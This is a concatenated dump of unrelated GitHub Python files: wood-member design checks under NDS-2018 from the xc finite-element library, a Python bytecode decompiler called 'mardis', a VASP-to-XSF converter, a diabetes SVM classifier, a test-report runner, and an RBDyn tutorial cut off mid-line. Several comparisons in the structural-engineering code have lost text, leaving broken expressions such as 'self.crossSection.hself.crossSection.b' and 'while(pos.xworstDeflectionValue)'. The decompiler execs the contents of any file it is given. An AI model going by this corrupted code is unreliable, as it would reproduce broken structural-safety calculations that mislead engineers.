plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n return Ke*self.unbracedLengthY/self.crossSection.b\n \n def getColumnSlendernessRatioH(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the H plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n return Ke*self.unbracedLengthZ/self.crossSection.h\n\n def getColumnSlendernessRatioBH(self):\n ''' Return both the slenderness ratios of the member working as\n column.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n srB= Ke*self.unbracedLengthY/self.crossSection.b\n srH= Ke*self.unbracedLengthZ/self.crossSection.h\n return (srB,srH)\n \n \n def getColumnSlendernessRatio(self):\n ''' Return the slenderness ratio of the member working as\n column.'''\n (srB, srH)= self.getColumnSlendernessRatioBH()\n return max(srB,srH)\n\n def getColumnStabilityFactor(self):\n ''' Return the column stability factor according\n to expressions 3.7-1 and 15.2-1 of NDS-2.018. \n '''\n (srB, srH)= self.getColumnSlendernessRatioBH()\n sr= max(srB,srH)\n E_adj= self.crossSection.getEminAdj()\n FcE= 0.822*E_adj/((sr)**2)\n Fc_adj= self.crossSection.getFcAdj()\n ratio= FcE/Fc_adj\n c= self.crossSection.wood.get37_1c()\n tmp= (1+ratio)/2.0/c\n retval= tmp-math.sqrt(tmp**2-ratio/c)\n if(self.crossSection.isBuiltUpSection()): # regular section.\n if(self.crossSection.bsrH): # weak-axis slenderness ratio governs.\n retval*= 0.6 # Equation 15.2-1\n return retval\n \n def getFcE1(self):\n ''' Return the critical buckling design value for compression\n members (F_{cE1}) as defined in section 3.9.2 of NDS-2.018\n for buckling about the major axis.\n '''\n E_adj= self.crossSection.getEminAdj()\n if(self.crossSection.h>self.crossSection.b): # Wide side: H\n return 0.822*E_adj/(self.getColumnSlendernessRatioH())**2\n else: # Wide side B\n return 0.822*E_adj/(self.getColumnSlendernessRatioB())**2\n \n def getFcE2(self):\n ''' Return the critical buckling design value for compression\n members (F_{cE2}) as defined in section 3.9.2 of NDS-2.018\n for buckling about the minor axis.\n '''\n E_adj= self.crossSection.getEminAdj()\n if(self.crossSection.hself.crossSection.b): # Wide side: H\n return (EH, EB)\n else: # Wide side B\n return (EB, EH)\n \n def getConcentratedLoadsBucklingLength(self, unbracedLength):\n ''' Return the effective length coefficient of the member according to table\n 3.3.3 of NDS-2018.\n\n :param unbracedLength: unbraced length for the bending axis.\n '''\n return self.memberLoadingCondition.getEffectiveLength(unbracedLength= unbracedLength, section= self.crossSection)\n\n def getBeamStabilityFactor(self, majorAxis= True):\n ''' Return the beam stability factor according to clauses 3.3.3 \n and 4.4.1.2 of AWC NDS-2018.\n\n :param majorAxis: if true return adjusted Fb for bending around major axis.\n '''\n if(majorAxis):\n ## Check if\n if(self.memberRestraint>self.crossSection.getRequiredRestraint()):\n retval= 1.0\n else: ## Equation 3.3-6\n FbE= self.getFbECriticalBucklingDesignValue()\n FbAdj= self.crossSection.getFbAdj(majorAxis= majorAxis)\n ratio= FbE/FbAdj\n A= (1+ratio)/1.9\n B= A**2\n C= ratio/0.95\n retval= A-math.sqrt(B-C)\n else:\n retval= 1.0\n return retval\n \n # def getFbECriticalBucklingDesignValue(self):\n # ''' Return the critical bucking design value for bending according to \n # section 3.3.3.8 of NDS-2018.\n # '''\n # RB= self.getBendingSlendernessRatio()\n # return 1.2*self.crossSection.wood.Emin/RB**2\n \n def getColumnEffectiveLength(self):\n ''' Return the effective length of the member working \n as column in the H and B planes.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n return (Ke*self.unbracedLengthZ, Ke*self.unbracedLengthY)\n \n def getColumnBendingSlendernessRatioH(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the H plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n le= Ke*self.unbracedLengthZ\n return math.sqrt(le*self.crossSection.h/self.crossSection.b**2)\n \n def getColumnBendingSlendernessRatioB(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the B plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n le= Ke*self.unbracedLengthY\n return math.sqrt(le*self.crossSection.b/self.crossSection.h**2)\n\n def getColumnBendingSlendernessRatioHB(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the H and B planes.'''\n leH, leB= self.getColumnEffectiveLength()\n return (math.sqrt(leH*self.crossSection.h/self.crossSection.b**2), math.sqrt(leB*self.crossSection.b/self.crossSection.h**2))\n \n def getColumnBendingSlendernessRatio(self):\n ''' Return the maximum slenderness ratio for bending between the\n H and B planes.'''\n srH, srB= self.getColumnBendingSlendernessRatioHB()\n return max(srH, srB)\n \n def getBeamEffectiveLength(self):\n ''' Return the effective length of the member working as beam \n according to table 3.3.3 of NDS-2018.\n '''\n return (self.getConcentratedLoadsBucklingLength(self.unbracedLengthZ), self.getConcentratedLoadsBucklingLength(self.unbracedLengthY))\n \n def getBeamBendingSlendernessRatioHB(self):\n ''' Return the slenderness ratio according to equation\n 3.3-5 of NDS-2018.\n '''\n (leH, leB)= self.getBeamEffectiveLength()\n return (math.sqrt(leH*self.crossSection.h/self.crossSection.b**2), math.sqrt(leB*self.crossSection.b/self.crossSection.h**2))\n \n def getFbECriticalBucklingDesignValueHB(self):\n ''' Return the critical bucking design value for bending according to \n section 3.3.3.8 of NDS-2018.\n '''\n sr= self.getBeamBendingSlendernessRatioHB()\n E_adj= self.crossSection.getEminAdj()\n return (1.2*E_adj/sr[0]**2, 1.2*E_adj/sr[1]**2)\n \n def getFbECriticalBucklingDesignValue(self):\n ''' Return the critical buckling desing value for bending (F_{bE}) \n as defined in section 3.9.2 of NDS-2.018.\n '''\n tmp= self.getFbECriticalBucklingDesignValueHB()\n return min(tmp[0], tmp[1])\n\n def getBiaxialBendingEfficiency(self, Nd, Myd, Mzd, Vyd= 0.0, chiN=1.0, chiLT= 1.0):\n '''Return biaxial bending efficiency according to clause 3.9 of AWC-NDS2018.\n\n :param Nd: required axial strength.\n :param Myd: required bending strength (minor axis).\n :param Mzd: required bending strength (major axis).\n :param Vyd: required shear strength (major axis)\n :param chiN: column stability factor clause 3.7.1 of AWC-NDS2018 (default= 1.0).\n :param chiLT: beam stability factor clause 3.3.3 of AWC-NDS2018 (default= 1.0).\n '''\n # Critical buckling design values for compression.\n FcE= self.getFcE()\n FbE= self.getFbECriticalBucklingDesignValue()\n return self.crossSection.getBiaxialBendingEfficiency(Nd= Nd, Myd= Myd, Mzd= Mzd, FcE= FcE, FbE= FbE, chiN= chiN, chiLT= chiLT)\n\n def updateLoadDurationFactor(self, loadCombExpr):\n '''Update the value of the load duration factors.'''\n if(self.loadCombDurationFactorFunction):\n CD= self.loadCombDurationFactorFunction(loadCombExpr)\n self.crossSection.updateLoadDurationFactor(CD)\n \n def updateReductionFactors(self):\n '''Update the value of the appropriate reduction factors.'''\n chiN= self.getColumnStabilityFactor()\n chiLT= self.getBeamStabilityFactor()\n FcE= self.getFcE()\n FbE= self.getFbECriticalBucklingDesignValue()\n for e in self.elemSet:\n e.setProp('chiLT',chiLT) # flexural strength reduction factor.\n e.setProp('chiN',chiN) # compressive strength reduction factor.\n e.setProp('FcE', FcE) # critical buckling design values for compression members (both axis).\n e.setProp('FbE', FbE) # critical buckling design value for bending members.\n \n def installULSControlRecorder(self, recorderType, chiN: float= 1.0, chiLT: float= 1.0, FcE= (0.0,0.0), FbE= 0.0, calcSet= None):\n '''Install recorder for verification of ULS criterion.\n\n :param recorderType: type of the recorder to install.\n :param chiN: compressive strength reduction factor.\n :param chiLT: flexural strength reduction factor.\n :param FcE: critical buckling design values for compression members (both axis).\n :param FbE: critical buckling design value for bending members.\n :param calcSet: set of elements to be checked (defaults to 'None' which \n means that this set will be created elsewhere). In not\n 'None' the member elements will be appended to this set.\n '''\n recorder= self.createRecorder(recorderType, calcSet)\n self.crossSection.setupULSControlVars(self.elemSet, chiN= chiN, chiLT= chiLT, FcE= FcE, FbE= FbE)\n nodHndlr= self.getPreprocessor().getNodeHandler \n if(nodHndlr.numDOFs==3):\n recorder.callbackRecord= controlULSCriterion2D()\n else:\n recorder.callbackRecord= controlULSCriterion()\n# recorder.callbackRestart= \"print(\\\"Restart method called.\\\")\" #20181121\n return recorder\n\ndef controlULSCriterion():\n return '''recorder= self.getProp('ULSControlRecorder')\nnmbComb= recorder.getCurrentCombinationName\ncrossSection= self.getProp('crossSection')\ncrossSection.checkBiaxialBendingForElement(self,nmbComb)\ncrossSection.checkYShearForElement(self,nmbComb)\ncrossSection.checkZShearForElement(self,nmbComb)'''\n\ndef controlULSCriterion2D():\n return '''recorder= self.getProp('ULSControlRecorder')\nnmbComb= recorder.getCurrentCombinationName\ncrossSection= self.getProp('crossSection')\ncrossSection.checkUniaxialBendingForElement(self,nmbComb)\ncrossSection.checkYShearForElement(self,nmbComb)'''\n\nclass BeamMember(Member):\n ''' Beam member according to chapter 3.3 of NDS-2018.\n\n '''\n def __init__(self, unbracedLength, section, connection= member_base.MemberConnection(), Cr= 1.0, memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition()):\n ''' Constructor. \n\n :param unbracedLengthX: unbraced length for torsional buckling \n about the longitudinal axis.\n :param connection: connection type at beam ends.\n :param Cr: repetitive member factor.\n :param memberLoadingCondition: parameters defining the member condition in order to obtain \n its effective length accordint to table 3.3.3 of AWC NDS-2018.\n '''\n super(BeamMember,self).__init__(name= None, unbracedLengthX= unbracedLength, section= section, Cr= Cr, connection= connection, memberRestraint= memberRestraint, memberLoadingCondition= memberLoadingCondition) \n \n def getEffectiveLength(self):\n ''' Return the effective length of the beam according to table\n 3.3.3 of NDS-2018.\n '''\n return self.getConcentratedLoadsBucklingLength(self.unbracedLengthX)\n \n def getBendingSlendernessRatio(self):\n ''' Return the slenderness ratio according to equation\n 3.3-5 of NDS-2018.\n '''\n le= self.getEffectiveLength()\n return math.sqrt(le*self.crossSection.h/self.crossSection.b**2)\n \n def getBiaxialBendingEfficiency(self, Nd, Myd, Mzd, Vyd= 0.0, chiN=1.0, chiLT= 1.0):\n '''Return biaxial bending efficiency according to clause 3.9 of AWC-NDS2018.\n\n :param Nd: required axial strength.\n :param Myd: required bending strength (minor axis).\n :param Mzd: required bending strength (major axis).\n :param Vyd: required shear strength (major axis)\n :param chiN: column stability factor clause 3.7.1 of AWC-NDS2018 (default= 1.0).\n :param chiLT: beam stability factor clause 3.3.3 of AWC-NDS2018 (default= 1.0).\n '''\n # Critical buckling design values for compression.\n return self.crossSection.getBiaxialBendingEfficiency(Nd= Nd, Myd= Myd, Mzd= Mzd, chiN= chiN, chiLT= chiLT)\n\nclass ColumnMember(Member):\n ''' Column member according to chapter 3.7 and 3.9 of NDS-2018.\n\n :ivar unbracedLengthB: unbraced lenght for bending about weak axis.\n '''\n def __init__(self, unbracedLengthB, unbracedLengthH, section, repetitiveMemberFactor= 1.0, connection= member_base.MemberConnection(), memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition(), loadCombDurationFactorFunction= None):\n ''' Constructor. \n\n :param unbracedLengthB: unbraced lenght for bending about weak axis (BworstCaseCF):\n worstCaseCF= CF\n worstCase= loadCombName\n return results, worstCase\n \nclass WallTopPlates(object):\n '''Plates on the top of a bearing wall.\n\n :ivar prb: XC finite element problem.\n :ivar plateSection: plate section.\n :ivar nodes: node handler.\n :ivar modelSpace: structural mechanics two-dimensional model of the plates.\n :ivar studSpacing: spacing of the studs that support the plates.\n :ivar trussSpacing: spacing of the trusses supported by the plates.\n :ivar pointLoadFactor: ??\n :ivar loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n def __init__(self, title, plateSection, studSpacing, trussSpacing, pointLoadFactor, loadCombDurationFactorFunction= None):\n '''Constructor.\n\n :param title: problem title.\n :param plateSection: plate section.\n :param nodes: node handler.\n :param modelSpace: structural mechanics two-dimensional model of the plates.\n :param studSpacing: spacing of the studs that support the plates.\n :param trussSpacing: spacing of the trusses supported by the plates.\n :param pointLoadFactor: ??\n :param loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n self.prb= xc.FEProblem()\n self.prb.title= title\n self.plateSection = plateSection\n preprocessor= self.prb.getPreprocessor \n self.nodes= preprocessor.getNodeHandler\n self.modelSpace= predefined_spaces.StructuralMechanics2D(self.nodes)\n self.studSpacing= studSpacing\n self.trussSpacing= trussSpacing\n self.pointLoadFactor= pointLoadFactor\n self.loadCombDurationFactorFunction= loadCombDurationFactorFunction\n \n def genMesh(self):\n ''' Create the finite element mesh.'''\n prep= self.modelSpace.preprocessor\n pointHandler= prep.getMultiBlockTopology.getPoints\n infPoints= list()\n supPoints= list()\n for i in range(0,14):\n x= i*self.studSpacing\n infPoints.append(pointHandler.newPoint(geom.Pos3d(x,0.0,0.0)))\n supPoints.append(pointHandler.newPoint(geom.Pos3d(x,self.plateSection.h,0.0)))\n\n lines= prep.getMultiBlockTopology.getLines\n self.infSet= prep.getSets.defSet(\"inf\")\n infLines= list()\n p0= infPoints[0]\n for p in infPoints[1:]:\n l= lines.newLine(p0.tag,p.tag)\n infLines.append(l)\n self.infSet.getLines.append(l)\n p0= p\n self.supSet= prep.getSets.defSet(\"sup\")\n supLines= list()\n p0= supPoints[0]\n for p in supPoints[1:]:\n l= lines.newLine(p0.tag,p.tag)\n supLines.append(l)\n self.supSet.getLines.append(l)\n p0= p\n self.infSet.fillDownwards()\n self.supSet.fillDownwards()\n\n # Mesh\n section= self.plateSection.defElasticShearSection2d(prep)\n trfs= prep.getTransfCooHandler\n lin= trfs.newLinearCrdTransf2d(\"lin\")\n seedElemHandler= prep.getElementHandler.seedElemHandler\n seedElemHandler.defaultMaterial= section.name\n seedElemHandler.defaultTransformation= lin.name\n elem= seedElemHandler.newElement(\"ElasticBeam2d\",xc.ID([0,0]))\n if __debug__:\n if(not elem):\n AssertionError('Can\\'t create the element.')\n infSetMesh= self.infSet.genMesh(xc.meshDir.I)\n if __debug__:\n if(not infSetMesh):\n AssertionError('Can\\'t create the mesh.')\n self.infSet.fillDownwards()\n supSetMesh= self.supSet.genMesh(xc.meshDir.I)\n if __debug__:\n if(not supSetMesh):\n AssertionError('Can\\'t create the mesh.')\n self.supSet.fillDownwards()\n\n ## Loaded nodes.\n self.loadedNodes= list()\n pos= supPoints[0].getPos+geom.Vector3d(self.studSpacing/2.0,0,0) #Position of the first loaded node\n xLast= supPoints[-1].getPos.x\n while(pos.xworstDeflectionValue):\n worstDeflectionValue= deflectionValue\n worstDeflectionCase= lcName\n \n bendingCF= results[lcName]['bendingCF']\n if(bendingCF>worstBendingCF):\n worstBendingCF= bendingCF\n worstBendingCase= lcName\n \n shearCF= results[lcName]['shearCF']\n if(shearCF>worstShearCF):\n worstShearCF= shearCF\n worstShearCase= lcName\n \n perpComprCF= results[lcName]['Fc_perpCF']\n if(perpComprCF>worstPerpComprCF):\n worstPerpComprCF= perpComprCF\n worstPerpComprCase= lcName\n # Store the values in a dictionary.\n worstResults= {'worstDeflectionCase':worstDeflectionCase, 'worstDeflectionValue':worstDeflectionValue, 'worstBendingCase':worstBendingCase, 'worstBendingCF':worstBendingCF, 'worstShearCase':worstShearCase, 'worstShearCF':worstShearCF, 'worstPerpComprCase':worstPerpComprCase, 'worstPerpComprCF':worstPerpComprCF}\n return results, worstResults\n\n def check(self, loadDict, combContainer):\n ''' Check the plates for the load arguments.\n\n :param loadDict: dictionary containing the load values.\n :param combContainer: load combinations.\n '''\n # Create model\n self.genMesh()\n # Define loads.\n self.defineLoads(loadDict)\n # Define load combinations.\n combContainer.dumpCombinations(self.modelSpace.preprocessor)\n # Checking\n return self.checkCombinations(combContainer.SLS.qp)\n \nclass AWCNDSBiaxialBendingControlVars(cv.BiaxialBendingStrengthControlVars):\n '''Control variables for biaxial bending normal stresses LS \n verification in steel-shape elements according to AISC.\n\n :ivar FcE: critical buckling design value for compression members (both axis).\n '''\n def __init__(self,idSection= 'nil',combName= 'nil',CF= -1.0,N= 0.0,My= 0.0,Mz= 0.0,Ncrd=0.0,McRdy=0.0,McRdz=0.0, FcE= (0.0,0.0), FbE= 0.0, chiLT=1.0, chiN= 1.0):\n '''\n Constructor.\n\n :param idSection: section identifier\n :param combName: name of the load combinations to deal with\n :param CF: capacity factor (efficiency) (defaults to -1)\n :param N: axial force (defaults to 0.0)\n :param My: bending moment about Y axis (defaults to 0.0)\n :param Mz: bending moment about Z axis (defaults to 0.0)\n :param Ncrd: design strength to axial compression\n :param McRdy: design moment strength about Y (weak) axis\n :param McRdz: design moment strength about Z (strong) axis\n :param FcE: critical buckling design value for compression members (both axis).\n :param FbE: critical bucking design value for bending according to \n section 3.3.3.8 of NDS-2018.\n :param chiLT: reduction factor for lateral-torsional buckling (defaults to 1)\n :param chiN: reduction factor for compressive strength (defaults to 1)\n '''\n super(AWCNDSBiaxialBendingControlVars,self).__init__(idSection,combName,CF,N,My,Mz,Ncrd=Ncrd,McRdy=McRdy,McRdz=McRdz, chiLT=chiLT, chiN= chiN)\n self.FcE= FcE\n self.FbE= FbE\n \n def getDict(self):\n ''' Return a dictionary containing the object data.'''\n retval= super(AWCNDSBiaxialBendingControlVars,self).getDict()\n retval.update({'FcE':self.FcE, 'FbE':self.FbE})\n return retval\n \n def setFromDict(self,dct):\n ''' Set the data values from the dictionary argument.'''\n super(AWCNDSBiaxialBendingControlVars,self).setFromDict(dct)\n self.FcE= dct['FcE']\n self.FbE= dct['FbE']\n\nclass BiaxialBendingNormalStressController(lsc.LimitStateControllerBase2Sections):\n '''Object that controls normal stresses limit state.'''\n\n ControlVars= AWCNDSBiaxialBendingControlVars\n def __init__(self, limitStateLabel):\n ''' Constructor.\n\n :param limitStateLabel: label that identifies the limit state.\n '''\n super(BiaxialBendingNormalStressController,self).__init__(limitStateLabel)\n\n def updateEfficiency(self, elem, elementInternalForces):\n ''' Compute the efficiency of the material of the element\n subjected to the internal forces argument and update\n its value if its bigger than the previous one.\n\n :param elem: finite element whose material will be checked.\n :param elementInternalForces: internal forces acting on the cross-section.\n '''\n # Get section properties.\n crossSection= elem.getProp('crossSection')\n if(not crossSection):\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; undefined \"crossSection\" property for element: '+str(elem.tag)+'; nothing done.')\n else:\n # Check each element section.\n for lf in elementInternalForces:\n # Compute efficiency.\n CFtmp= crossSection.getBiaxialBendingEfficiency(Nd= lf.N, Myd= lf.My, Mzd= lf.Mz, FcE= lf.FcE, FbE= lf.FbE, chiN= lf.chiN, chiLT= lf.chiLT)[0]\n sectionLabel= self.getSectionLabel(lf.idSection)\n label= self.limitStateLabel+sectionLabel\n # Update efficiency.\n if(CFtmp>elem.getProp(label).CF):\n elem.setProp(label,self.ControlVars(idSection= sectionLabel, combName= lf.idComb, CF= CFtmp, N= lf.N, My= lf.My, Mz= lf.Mz, FcE= lf.FcE, FbE= lf.FbE, chiN= lf.chiN, chiLT= lf.chiLT))\n \nclass ShearController(lsc.LimitStateControllerBase2Sections):\n '''Object that controls shear limit state.'''\n\n ControlVars= cv.ShearYControlVars\n def __init__(self,limitStateLabel):\n ''' Constructor.\n\n :param limitStateLabel: label that identifies the limit state.\n '''\n super(ShearController,self).__init__(limitStateLabel)\n\n def updateEfficiency(self, elem, elementInternalForces):\n ''' Compute the efficiency of the element steel shape\n subjected to the internal forces argument and update\n its value if its bigger than the previous one.\n\n :param elem: finite element whose section will be checked.\n :param elementInternalForces: internal forces acting on the steel shape.\n '''\n # Get section properties.\n crossSection= elem.getProp('crossSection')\n if(not crossSection):\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; undefined \"crossSection\" property for element: '+str(elem.tag)+'; nothing done.')\n else:\n # Check each element section.\n for sectionIForces in elementInternalForces:\n # Compute efficiency.\n CFtmp= crossSection.getYShearEfficiency(sectionIForces.Vy)\n sectionLabel= self.getSectionLabel(sectionIForces.idSection)\n label= self.limitStateLabel+sectionLabel\n # Update efficiency.\n if(CFtmp>elem.getProp(label).CF):\n elem.setProp(label,self.ControlVars(sectionLabel+'s',sectionIForces.idComb,CFtmp,sectionIForces.Vy))\n","repo_name":"xcfem/xc","sub_path":"python_modules/materials/awc_nds/AWCNDS_limit_state_checking.py","file_name":"AWCNDS_limit_state_checking.py","file_ext":"py","file_size_in_byte":45189,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"30374673674","text":"# Repo: https://github.com/kapten-kaizo/mardis\n# Author: @Kang_Ehem\n# Update at: 17 January 2022 23.17\nimport os\nimport sys\nimport re\nimport datetime\nimport types\nimport base64\ntry:\n import uncompyle6\nexcept Exception as i:\n exit(str(i))\nscript_name = 'mardis'\ncode_marshal = base64.b64decode('JXMKaW1wb3J0IHVuY29tcHlsZTYsIHN5cwpkZWYgZGVjb21waWxlKHZlcnNpb24sIGNvZGVfb2JqZWN0LCBpbyk6CiAgICB0cnk6CiAgICAgICAgdW5jb21weWxlNi5tYWluLmRlY29tcGlsZSh2ZXJzaW9uLCBjb2RlX29iamVjdCwgaW8pCiAgICBleGNlcHQ6IHByaW50KCJkZWNvbXBpbGUgZXJvcj8iKQppZiBoYXNhdHRyKHNzLCAiY29fY29kZSIpOgogICAgZGVjb21waWxlKDIuNywgc3MsIHN5cy5zdGRvdXQpCmVsc2U6IHByaW50KHNzKQ==')\nhave_code = base64.b64decode('IyBEZWNvbXBpbGUgYnkgTWFyZGlzIChUb29scyBCeSBLYXB0ZW4tS2Fpem8pCiMgVGltZSBTdWNjZXMgZGVjb21waWxlIDogJXMKJXMK')\ndef rmbg(file_name):\n r = open(file_name).read()\n console = [line for line in r.splitlines() if not line.startswith(\"#\")]\n timestap = str(datetime.datetime.now())\n result_code = have_code % (timestap, \"\\n\".join(console))\n with open(file_name, mode='w') as save_dis:\n save_dis.write(result_code)\n exit(\"decompiling done!. saved to `%s`\" % file_name)\ndef simpen_cok(file, string, message):\n with open(file,\"w\") as indihome:\n indihome.write(string)\n exit(message)\nfind_string_exec = lambda master_key: master_key.replace(\"\".join([\"exec\",re.findall(\"exec(.*)\",master_key)[0]]),\"\".join([\"ss=\",re.findall(\"exec(.*)\",master_key)[0]]))\ndef show_info(string):\n try:\n exec(string)\n except Exception as i:\n simpen_cok(sys.argv[1],save_code,\"Exception: %s\"%str(i))\n if type(ss) is types.CodeType:\n print(\"%s: %s\"%(dah_lah, str(ss)))\n else:print(\"%s: No Compile Module given !!\"%dah_lah)\ndef dis(nama_file, output_file, ekse_file):\n master_key = open(nama_file).read()\n line = len([master_key.splitlines()][0])\n if master_key.count(\"decompile eror?\")!=0:\n if os.path.exists(output_file):\n simpen_cok(output_file,save_code,\"%s: Decompile error!\" % script_name)\n else:exit(\"%s: Decompile failed!\" % script_name)\n globals()[\"save_code\"]=master_key\n if master_key.count(\"exec\")!=0:\n if len(re.findall(\"exec(.*)\",master_key)) > 1:\n simpen_cok(output_file,save_code,\"%s: Exec string is biggest!!\" % script_name)\n else:new_code = find_string_exec(master_key)\n show_info(new_code)\n open(ekse_file,\"w\").write(code_marshal%new_code)\n os.system(\"python2 %s > %s\" % (ekse_file, output_file))\n if os.path.exists(ekse_file):\n os.unlink(ekse_file)\n dis(output_file, output_file, ekse_file)\n else:\n if os.path.exists(output_file):\n rmbg(output_file)\n else:exit(\"%s: decompile failed!. not found `exec`\" % nama_file)\nclass Type:\n def __init__(self,code):\n self.message=str(code)\n self.co_argcount = code.co_argcount\n self.co_nlocals = code.co_nlocals\n self.co_stacksize = code.co_stacksize\n self.co_flags = code.co_flags\n self.co_code = code.co_code\n self.co_consts = code.co_consts\n self.co_names = code.co_names\n self.co_varnames = code.co_varnames\n self.co_filename = code.co_filename\n self.co_name = code.co_name\n self.co_firstlineno = code.co_firstlineno\n self.co_lnotab = code.co_lnotab\n self.co_freevars = code.co_freevars\n self.co_cellvars = code.co_cellvars\n def myasm(co):\n return types.CodeType(co.co_argcount,co.co_nlocals,co.co_stacksize,co.co_flags,co.co_code,co.co_consts,co.co_names,co.co_varnames,co.co_filename,co.co_name,co.co_firstlineno,co.co_lnotab,co.co_freevars,co.co_cellvars)\n def __repr__(self):\n return self.message\n def __str__(self):\n return self.message\ndef main():\n if len(sys.argv) != 2:\n exit(\"usage: mardis file_name.py\")\n globals()['dah_lah']=sys.argv[1]\n sys.argv=[dah_lah,\"code.py\",\".master_key\"]\n print(\"If You Get Error Decompile, Error code saved to %s\"%sys.argv[1])\n dis(*sys.argv)\nif __name__ == \"__main__\":\n main()\n# Nyari Paan Lu Gan !!","repo_name":"kapten-kaizo/mardis","sub_path":"mardis.py","file_name":"mardis.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"31"} +{"seq_id":"16651342859","text":"import sys\nimport numpy as np\n\nfilename = sys.argv[1]\n\nwith open(filename, \"r\") as vasp :\n # read vasp file\n next(vasp); next(vasp)\n lvs = list()\n for i in range(3) :\n for line in vasp :\n lvs.append(line.split())\n break\n lvs = np.array(lvs).astype(float)\n for line in vasp :\n elems = line.split()\n break\n nelems = list()\n for line in vasp :\n for item in line.split() :\n nelems.append(int(item))\n break\n elem_list = list()\n for elem, nelem in zip(elems, nelems) :\n elem_list += [elem] * nelem\n next(vasp)\n coords = list()\n for line in vasp :\n coords.append(line.split())\n coords = np.array(coords).astype(float)\n \n # make xsf file\n with open(filename[:-11] + \"xsf\", \"w\") as xsf :\n xsf.write(\"CRYSTAL\\nPRIMVEC\\n\")\n for row in lvs :\n xsf.write(\"{: 14.9f} {: 13.9f} {: 13.9f}\\n\".format(row[0], row[1], row[2]))\n xsf.write(\"PRIMCOORD\\n\" + str(coords.shape[0]) + \"\\n\")\n for elem, coord in zip(elem_list, coords) :\n xsf.write(\"{:2} {: 17.9f} {: 13.9f} {: 13.9f}\\n\".format(elem, coord[0], coord[1], coord[2]))\n","repo_name":"rwexler/qetools","sub_path":"structure/vasp2xsf.py","file_name":"vasp2xsf.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70791308889","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\npdiabetes = pd.read_csv('diabetes.csv', header=None)\nprint(pdiabetes[0:5])\n\nx=pdiabetes.iloc[1:,:8]\ny=pdiabetes.iloc[1:,8:].values.flatten()\nprint('x shape: ', x.shape, 'y shape: ', y.shape)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0)\nstd_scl = StandardScaler()\nstd_scl.fit(x_train)\n\nx_train = std_scl.transform(x_train)\nx_test = std_scl.transform(x_test)\n\nsvc = SVC(kernel='rbf')\nsvc.fit(x_train, y_train)\n\nprint('학습 데이터 정확도 : ', svc.score(x_train, y_train))\nprint('테스트 데이터 정확도 : ', svc.score(x_test, y_test))","repo_name":"YoungSeok-Choi/Machine-Running-practice","sub_path":"당뇨병 판정.py","file_name":"당뇨병 판정.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8987844727","text":"import unittest\n# from lib.HTMLTestRunner import HTMLTestRunner\nfrom lib.BeautifulReport.BeautifulReport import BeautifulReport\nimport os\nimport time\n\nif __name__ == '__main__':\n path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'test_blog_case')\n suite = unittest.defaultTestLoader.discover(path, pattern='test*.py', top_level_dir=None)\n\n project_root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n report_dir = os.path.join(project_root, 'report')\n current_time = time.strftime(\"%Y-%m-%d_%H-%M-%S\")\n # report_abspath = os.path.join(report_dir, \"HTMLReport_{}.html\".format(current_time))\n # with open(report_abspath, 'wb') as f:\n # runner = HTMLTestRunner(stream=f,\n # title='自动化测试报告',\n # description='用例执行情况',\n # verbosity=2\n # )\n\n result = BeautifulReport(suite)\n result.report(filename=current_time +'自动化测试报告',\n description='用例执行情况',\n log_path=report_dir\n )\n # runner.run(suite)\n\n\n","repo_name":"hy546880109/auto_web_test","sub_path":"main/run_test_report.py","file_name":"run_test_report.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72464104087","text":"import eigen3 as e\nimport spacevecalg as sva\nimport rbdyn as rbd\n\n\ndef TutorialTree():\n \"\"\"\n Return the MultiBodyGraph, MultiBody and the zeroed MultiBodyConfig with the\n following tree structure:\n\n b4\n j3 | Spherical\n Root j0 | j1 j2 j4\n ---- b0 ---- b1 ---- b2 ----b3 ----b5\n Fixed RevX RevY RevZ PrismZ\n \"\"\"\n\n mbg = rbd.MultiBodyGraph()\n\n mass = 1.\n I = e.Matrix3d.Identity()\n h = e.Vector3d.Zero()\n\n rbi = sva.RBInertia(mass, h, I)\n\n b0 = rbd.Body(rbi, 0, \"b0\")\n b1 = rbd.Body(rbi, 1, \"b1\")\n b2 = rbd.Body(rbi, 2, \"b2\")\n b3 = rbd.Body(rbi, 3, \"b3\")\n b4 = rbd.Body(rbi, 4, \"b4\")\n b5 = rbd.Body(rbi, 5, \"b5\")\n\n mbg.addBody(b0)\n mbg.addBody(b1)\n mbg.addBody(b2)\n mbg.addBody(b3)\n mbg.addBody(b4)\n mbg.addBody(b5)\n\n j0 = 